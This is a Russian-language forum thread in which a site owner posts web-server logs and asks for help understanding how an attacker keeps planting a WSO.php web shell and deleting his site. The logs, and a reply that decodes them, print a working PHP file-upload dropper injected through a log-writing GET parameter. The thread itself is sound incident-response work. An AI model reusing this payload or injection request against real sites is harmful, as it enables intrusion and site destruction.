Помогите прочесть Логи

Styvoin · 11 Июл 2016

Ситуация такая. Какой то моральный у..од постоянно удаляет мне сайт.
Проверяю сайт айболитом ничего не находит ни шеллов ни чего. Но по логам видно что после определенных действий в директории появляется файл WSO.php я так понимаю это и есть шелл
Помогите удалить причину его заливки
Вот кусок Логов

timegarant.ru 88.147.153.231 - - [11/Jul/2016:18:59:02 +0300] "GET / HTTP/1.1" 200 7681 "Для просмотра ссылки Войди или Зарегистрируйся" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 YaBrowser/15.12.1.6478 Safari/537.36"
timegarant.ru 88.147.153.231 - - [11/Jul/2016:18:59:02 +0300] "GET /themes/bootlance/fonts/fontawesome-webfont.woff2?v=4.5.0 HTTP/1.1" 304 - "Для просмотра ссылки Войди или Зарегистрируйся" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 YaBrowser/15.12.1.6478 Safari/537.36"
timegarant.ru 88.147.153.231 - - [11/Jul/2016:18:59:05 +0300] "GET /admin HTTP/1.1" 302 26 "Для просмотра ссылки Войди или Зарегистрируйся" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 YaBrowser/15.12.1.6478 Safari/537.36"
timegarant.ru 88.147.153.231 - - [11/Jul/2016:18:59:06 +0300] "GET /cpanel HTTP/1.1" 200 5294 "Для просмотра ссылки Войди или Зарегистрируйся" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 YaBrowser/15.12.1.6478 Safari/537.36"
timegarant.ru 88.147.153.231 - - [11/Jul/2016:18:59:07 +0300] "GET /lib/font-awesome/fonts/fontawesome-webfont.woff2?v=4.6.2 HTTP/1.1" 200 71760 "Для просмотра ссылки Войди или Зарегистрируйся" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 YaBrowser/15.12.1.6478 Safari/537.36"
timegarant.ru 88.147.153.231 - - [11/Jul/2016:18:59:09 +0300] "GET /users HTTP/1.1" 200 6423 "Для просмотра ссылки Войди или Зарегистрируйся" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 YaBrowser/15.12.1.6478 Safari/537.36"
timegarant.ru 66.249.78.15 - - [11/Jul/2016:18:59:54 +0300] "GET /qa/%D1%80%D0%B0%D0%B7%D0%B4%D0%B5%D0%BB-%D0%BC%D0%B0%D0%B3%D0%B0%D0%B7%D0%B8%D0%BD HTTP/1.1" 200 3933 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +Для просмотра ссылки Войди или Зарегистрируйся)"
timegarant.ru 66.249.78.15 - - [11/Jul/2016:19:00:32 +0300] "GET /users HTTP/1.1" 200 6042 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +Для просмотра ссылки Войди или Зарегистрируйся)"
timegarant.ru 62.210.26.88 - - [11/Jul/2016:19:06:04 +0300] "GET / HTTP/1.1" 200 7269 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 62.210.26.88 - - [11/Jul/2016:19:06:09 +0300] "GET /qa/ HTTP/1.1" 302 286 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 62.210.26.88 - - [11/Jul/2016:19:06:09 +0300] "GET /qa/ HTTP/1.1" 200 6748 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 62.210.26.88 - - [11/Jul/2016:19:06:10 +0300] "GET /qa/?qa=image&qa_blobid=17976891549743361547&qa_size=200 HTTP/1.1" 302 346 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 62.210.26.88 - - [11/Jul/2016:19:06:36 +0300] "GET /qa/?file&log_file=logs-list.php&log=%3C?php%20error_reporting(-1);%20ini_set(%27display_errors%27,%20%27On%27);%20echo%20ini_get(%27file_uploads%27).%27%3Cbr%3E%27;%20echo%20ini_get(%27upload_max_filesize%27).%27%3Cbr%3E%27;%20echo%20ini_get(%27upload_tmp_dir%27).%27%3Cbr%3E%27;%20$current_url%20=%20dirname(__FILE__);%20if%20(isset($_POST[%27up%27]))%20{%20if%20(isset($_POST[%27url%27]))%20{%20$url%20=%20$_POST[%27url%27];%20}%20else%20{%20$url%20=%20$current_url;%20}%20echo%20%27%D1%84%D0%BE%D1%80%D0%BC%D0%B0%20%D0%BE%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%BB%D0%B5%D0%BD%D0%B0%27;%20echo%20%27%3Cpre%3E%27.print_r($_FILES,%20true).%27%3C/pre%3E%27;%20@mkdir($url,%200777);%20move_uploaded_file($_FILES[%27IMG%27][%27tmp_name%27],$url.%27/%27.$_FILES[%27IMG%27][%27name%27]);%20}%20?%3E%20%3Cform%20method=%22POST%22%20enctype=%22multipart/form-data%22%3E%20%3Cinput%20type=%22text%22%20name=%22url%22%20value=%22%3C?php%20echo%20!empty($_POST[%27url%27])%20?%20$_POST[%27url%27]%20:%20$current_url;%20?%3E%22%3E%3Cbr%3E%20%3Cinput%20type=%22file%22%20name=%22IMG%22/%3E%3Cbr%3E%20%3Cinput%20type=%22submit%22%20name=%22up%22%20value=%22UP%22/%3E%20%3C/form%3E HTTP/1.1" 200 7961 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 62.210.26.88 - - [11/Jul/2016:19:06:36 +0300] "GET /qa/?qa=image&qa_blobid=17976891549743361547&qa_size=200 HTTP/1.1" 302 346 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 62.210.26.88 - - [11/Jul/2016:19:06:44 +0300] "GET /qa/logs-list.php HTTP/1.1" 200 248 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 62.210.26.88 - - [11/Jul/2016:19:06:52 +0300] "POST /qa/logs-list.php HTTP/1.1" 200 511 "Для просмотра ссылки Войди или Зарегистрируйся" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 62.210.26.88 - - [11/Jul/2016:19:06:59 +0300] "GET /qa/WSO.php HTTP/1.1" 200 24137 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 62.210.26.88 - - [11/Jul/2016:19:06:59 +0300] "GET /qa/WSO.php HTTP/1.1" 200 24137 "Для просмотра ссылки Войди или Зарегистрируйся" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 62.210.26.88 - - [11/Jul/2016:19:07:02 +0300] "POST /qa/WSO.php HTTP/1.1" 200 40344 "Для просмотра ссылки Войди или Зарегистрируйся" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 62.210.26.88 - - [11/Jul/2016:19:07:02 +0300] "GET /qa/WSO.php HTTP/1.1" 200 24137 "Для просмотра ссылки Войди или Зарегистрируйся" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 62.210.26.88 - - [11/Jul/2016:19:07:06 +0300] "POST /qa/WSO.php HTTP/1.1" 200 13874 "Для просмотра ссылки Войди или Зарегистрируйся" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 62.210.26.88 - - [11/Jul/2016:19:07:06 +0300] "GET /qa/WSO.php HTTP/1.1" 404 285 "Для просмотра ссылки Войди или Зарегистрируйся" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 62.210.26.88 - - [11/Jul/2016:19:07:12 +0300] "GET / HTTP/1.1" 403 286 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 95.83.33.84 - - [11/Jul/2016:19:07:23 +0300] "GET / HTTP/1.1" 403 286 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 YaBrowser/16.6.0.8125 Safari/537.36"
timegarant.ru 95.83.33.84 - - [11/Jul/2016:19:07:33 +0300] "GET /favicon.ico HTTP/1.1" 404 286 "Для просмотра ссылки Войди или Зарегистрируйся" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 YaBrowser/16.6.0.8125 Safari/537.36"
timegarant.ru 95.83.33.84 - - [11/Jul/2016:19:07:35 +0300] "GET /market HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 YaBrowser/16.6.0.8125 Safari/537.36"
timegarant.ru 62.210.26.88 - - [11/Jul/2016:19:08:13 +0300] "GET / HTTP/1.1" 403 286 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 95.83.33.84 - - [11/Jul/2016:19:08:35 +0300] "GET / HTTP/1.1" 403 286 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 YaBrowser/16.6.0.8125 Safari/537.36"
timegarant.ru 66.249.78.22 - - [11/Jul/2016:19:09:58 +0300] "GET /users/pjiel HTTP/1.1" 404 286 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +Для просмотра ссылки Войди или Зарегистрируйся)"
timegarant.ru 109.75.36.59 - - [11/Jul/2016:19:11:09 +0300] "GET /users/admin?tab=projects&cat=razrabsite HTTP/1.1" 404 286 "Для просмотра ссылки Войди или Зарегистрируйся" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 109.75.36.59 - - [11/Jul/2016:19:11:09 +0300] "GET /favicon.ico HTTP/1.1" 404 286 "Для просмотра ссылки Войди или Зарегистрируйся" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 66.249.78.22 - - [11/Jul/2016:19:11:33 +0300] "GET /users/alpha HTTP/1.1" 404 286 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +Для просмотра ссылки Войди или Зарегистрируйся)"
timegarant.ru 88.147.153.231 - - [11/Jul/2016:19:13:31 +0300] "GET /users HTTP/1.1" 404 280 "Для просмотра ссылки Войди или Зарегистрируйся" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 YaBrowser/15.12.1.6478 Safari/537.36"
timegarant.ru 88.147.153.231 - - [11/Jul/2016:19:13:43 +0300] "GET / HTTP/1.1" 403 286 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 YaBrowser/15.12.1.6478 Safari/537.36"

Styvoin · 11 Июл 2016

Ip этого урода 62.210.26.88
прикладываю еще скрин логов так удобнее

sindrom1974 · 11 Июл 2016

Пытается записать вот это

Код:

<?php error_reporting(-1); ini_set('display_errors', 'On'); echo ini_get('file_uploads').'<br>'; echo ini_get('upload_max_filesize').'<br>'; echo ini_get('upload_tmp_dir').'<br>'; $current_url = dirname(__FILE__); if (isset($_POST['up'])) { if (isset($_POST['url'])) { $url = $_POST['url']; } else { $url = $current_url; } echo 'С„РѕСЂРјР° РѕС‚РїСЂР°РІР»РµРЅР°'; echo '<pre>'.print_r($_FILES, true).'</pre>'; @mkdir($url, 0777); move_uploaded_file($_FILES['IMG']['tmp_name'],$url.'/'.$_FILES['IMG']['name']); } ?> <form method="POST" enctype="multipart/form-data"> <input type="text" name="url" value="<?php echo !empty($_POST['url']) ? $_POST['url'] : $current_url; ?>"><br> <input type="file" name="IMG"/><br> <input type="submit" name="up" value="UP"/> </form>

в лог и далее через форму этого кода загрузить файл, то есть шелл. Сквозит у вас, причём конкретно.

latteo · 11 Июл 2016

Вот там где лог, там гораздо удобнее только надо было тегом [\code][\/code] обернуть
судя по нему у тебя уязвимость выполнения кода из GET строки, хотя у меня не получилось её использовать, может там еще что-то в куках или уже пофиксил.
Для нормальной рекомендации надо видеть файл к оторый срабатывает при таком вызове /qa/?file&log_file=logs-list.php и при таком /qa/logs-list.php

Styvoin · 12 Июл 2016

latteo написал(а):
Вот там где лог, там гораздо удобнее только надо было тегом [\code][\/code] обернуть
судя по нему у тебя уязвимость выполнения кода из GET строки, хотя у меня не получилось её использовать, может там еще что-то в куках или уже пофиксил.
Для нормальной рекомендации надо видеть файл к оторый срабатывает при таком вызове /qa/?file&log_file=logs-list.php и при таком /qa/logs-list.php

Вот я вперся он задень раз по 10 удаляет файлы я только и успеваю перезаливать их. за 10 дней уже больше 50 стр с индекса вылетели.
Я мало в этом разбираюсь может сможете помочь чем то?

latteo · 12 Июл 2016

Styvoin написал(а):
Я мало в этом разбираюсь может сможете помочь чем то?

Выложите файлик logs-list.php, скорее всего в нём уязвимость.

sindrom1974 · 12 Июл 2016

Styvoin написал(а):
Какой то моральный у..од

Искать надо среди тех кто имел доступ к коду. Зачем банально удалять ваш сайт, какая ему от этого выгода. Больше на месть похоже. Если он к коду не имел доступ, то он просто ГЕНИЙ. Так как вы забили на аудит безопасности, вот вам и ягодки. ИХМО

Styvoin · 12 Июл 2016

latteo написал(а):
Выложите файлик logs-list.php, скорее всего в нём уязвимость.

содержимое файла logs-list.php

Скрытое содержимое доступно для зарегистрированных пользователей!

Но файла test2.php я не смог найти в файлах сайта.
И я тоже думал что проблема из за него и удалил данный файл но сайт он все ровно удалял

Styvoin · 12 Июл 2016

sindrom1974 написал(а):
Искать надо среди тех кто имел доступ к коду. Зачем банально удалять ваш сайт, какая ему от этого выгода. Больше на месть похоже. Если он к коду не имел доступ, то он просто ГЕНИЙ. Так как вы забили на аудит безопасности, вот вам и ягодки. ИХМО

Сайт я купил около 2 месяцев назад и кто до меня там что делал точнее сколько человек я без понятия

sindrom1974 · 12 Июл 2016

Styvoin написал(а):
содержимое файла logs-list.php

Но файла test2.php я не смог найти в файлах сайта.
И я тоже думал что проблема из за него и удалил данный файл но сайт он все ровно удалял

Ну содержимое файла, по крайней мере то, что он туда пишет я привел выше. Он же потом удаляет сайт. А это я так понимаю, то что изначально в нём. Вот он подключается

Код:

timegarant.ru 62.210.26.88 - - [11/Jul/2016:19:06:04 +0300] "GET / HTTP/1.1" 200 7269 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 62.210.26.88 - - [11/Jul/2016:19:06:09 +0300] "GET /qa/ HTTP/1.1" 302 286 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
timegarant.ru 62.210.26.88 - - [11/Jul/2016:19:06:09 +0300] "GET /qa/ HTTP/1.1" 200 6748 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

Почему у него при первом обращении к /ga ошибка 302, а следующий выполняется успешно. Далее /qa/?qa=image&qa_blobid=17976891549743361547&qa_size=200 также дает ошибку 302, как и остальные его попытку с таким же запросом. Но после он пишет в файл /qa/?file&log_file=logs-list.php&log=(код), который оканчивается 200 успехом! Ищите класс, функцию, которая позволяет это делать. /ga это магазин у вас? Типа ga/?file это ищите, класс, функция которые обрабатывают этот запрос. Я не знаю этот фреймворк. Уверен это лишь одна из щелей откуда дует. Вообще если бы он хотел заработать, то связался бы с вами и предложил бы за плату исправить уязвимость.

Помогите прочесть Логи

Styvoin

Постоялец

Styvoin

Постоялец

sindrom1974

Хранитель порядка

latteo

Эффективное использование PHP, MySQL

Styvoin

Постоялец

latteo

Эффективное использование PHP, MySQL

sindrom1974

Хранитель порядка

Styvoin

Постоялец

Styvoin

Постоялец

sindrom1974

Хранитель порядка

Вложения